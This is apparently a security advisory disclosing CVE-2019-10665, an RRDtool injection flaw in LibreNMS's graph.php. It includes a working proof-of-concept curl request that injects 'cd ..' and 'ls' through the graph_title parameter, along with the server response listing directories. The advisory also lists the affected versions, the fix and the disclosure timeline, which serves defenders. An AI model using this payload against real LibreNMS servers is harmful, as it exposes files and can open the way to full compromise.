LibreNMS RRDtool Injection Vulnerability

15 July 2019

 

CVE   

 

CVE-2019-10665

 

CVSS SCORE

 

9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

XID

 

XL-19-023

 

AFFECTED VENDORS

 

LibreNMS (www.librenms.org)

 

CREDIT

 

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY     

 

 

 

 

LibreNMS uses RRDtool to draw graphs; xen1thLabs discovered a way to inject syntax to the RRDtool. There are several ways to exploit this vulnerability, including information disclosure, denial of service and arbitrary file writes. This vulnerability can be combined with other vulnerabilities identified by xen1thLabs to achieve unauthenticated remote code execution. LibreNMS version 1.50.1 altered this vulnerability without correctly patching it and the subsequent vulnerability details is recorded under CVE-2019-12463.

 

TECHNICAL DETAILS

 

 

 

 

     

 

The scripts, which handle the graphing options (includes/graphs/common.inc.php and includes/graphs/graphs.inc.php), do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with mysqli_real_escape_string, which is only useful for preventing SQL injection attacks, other parameters are unfiltered. This allows an attacker to inject RRDtool operations or syntax with new line characters via the html/graph.php script. The input is sent to RRDtool via a pipe, the syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, file content, denial of service or writing arbitrary files.

 

PROOF OF CONCEPT  

 

 

The following command and HTTP resonse shows the vulnerability:

$ curl "http://host/graph.php?device=&type=device_ber&from=1&graph_title=1'%0a%0acd+.. %0als%0a'&to=2&width=50&height=300&debug=1"

 

 

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)

Date: Thu, 28 Mar 2019 09:27:14 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Set-Cookie: PHPSESSID=barhqud83fsssqfujsttl3a789; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 2037

 

<p>graph /tmp/iLL5TDy2mYT12Vza  --alt-autoscale-max --rigid -E --start 1

 

cd ..

ls

 --end 2 --width 50 --height 300 -c BACK#EEEEEE00 -c SHADEA#EEEEEE00 -c SHADEB#EEEEEE00 -c FONT#000000 -c CANVAS#FFFFFF00 -c GRID#a5a5a5 -c MGRID#FF9999 -c FRAME#5e5e5e -c ARROW#5e5e5e -R normal --font LEGEND:7:DejaVuSansMono --font AXIS:6:DejaVuSansMono --font-render-mode normal HRULE:0#555555 --title='device*ber ' --daemon unix:/var/run/rrdcached/rrdcached.sock</p><p>command returned (OK u:0.00 s:0.00 r:0.00

)</p><pre></pre><p>graph /tmp/iLL5TDy2mYT12Vza  --alt-autoscale-max --rigid -E --start 1

 

cd ..

ls

 --end 2 --width 50 --height 300 -c BACK#EEEEEE00 -c SHADEA#EEEEEE00 -c SHADEB#EEEEEE00 -c FONT#000000 -c CANVAS#FFFFFF00 -c GRID#a5a5a5 -c MGRID#FF9999 -c FRAME#5e5e5e -c ARROW#5e5e5e -R normal --font LEGEND:7:DejaVuSansMono --font AXIS:6:DejaVuSansMono --font-render-mode normal HRULE:0#555555 --title='Def Error' --daemon unix:/var/run/rrdcached/rrdcached.sock</p><p>command returned (RRDtool 1.7.0  Copyright by Tobias Oetiker <tobi@oetiker.ch>

               Compiled Mar  1 2018 09:35:27

 

Usage: rrdtool [options] command command_options

Valid commands: create, update, updatev, graph, graphv,  dump, restore,

                                last, lastupdate, first, info, list, fetch, tune,

                                resize, xport, flushcached

 

Valid remote commands: quit, ls, cd, mkdir, pwd

 

RRDtool is distributed under the Terms of the GNU General

Public License Version 2. (www.gnu.org/copyleft/gpl.html)

 

For more information read the RRD manpages

 

OK u:0.00 s:0.00 r:0.01

OK u:0.00 s:0.00 r:0.01

d test

d .github

d tests

d rrd

d bootstrap

d ..

d scripts

d doc

d licenses

d logs

d contrib

d html

d misc

d resources

d .cache

d .git

d config

d storage

d routes

d sql-schema

d .

d cache

d mibs

d LibreNMS

d database

d .composer

d .gnupg

d includes

d vendor

d app

OK u:0.00 s:0.00 r:0.01

ERROR: unknown function '--end'

)</p><pre></pre><br />Runtime 0.033s<br />MySQL [0/0.00s]: Cell[0/0.00s] Row[0/0.00s] Rows[-4/-0.00s] Column[4/0.00s] Update[0/0.00s] Insert[0/0.00s] Delete[0/0.00s]

 

 

Figure 1 – Disclosing directory structure and files.

AFFECTED SYSTEMS  

  

LibreNMS 1.47 and older

 

SOLUTION  

 

Upgrade to the latest version of LibreNMS

 

DISCLOSURE TIMELINE 

 

 

 

 

26/03/2019 - Contacted LibreNMS developer requesting disclosure coordination

28/03/2019 - Provided vulnerability details

16/04/2019 – Version 1.50.1 released, but did not resolve this issue

01/07/2019 – Version 1.53 released which patches this issue

15/07/2019 – xen1thLabs public disclosure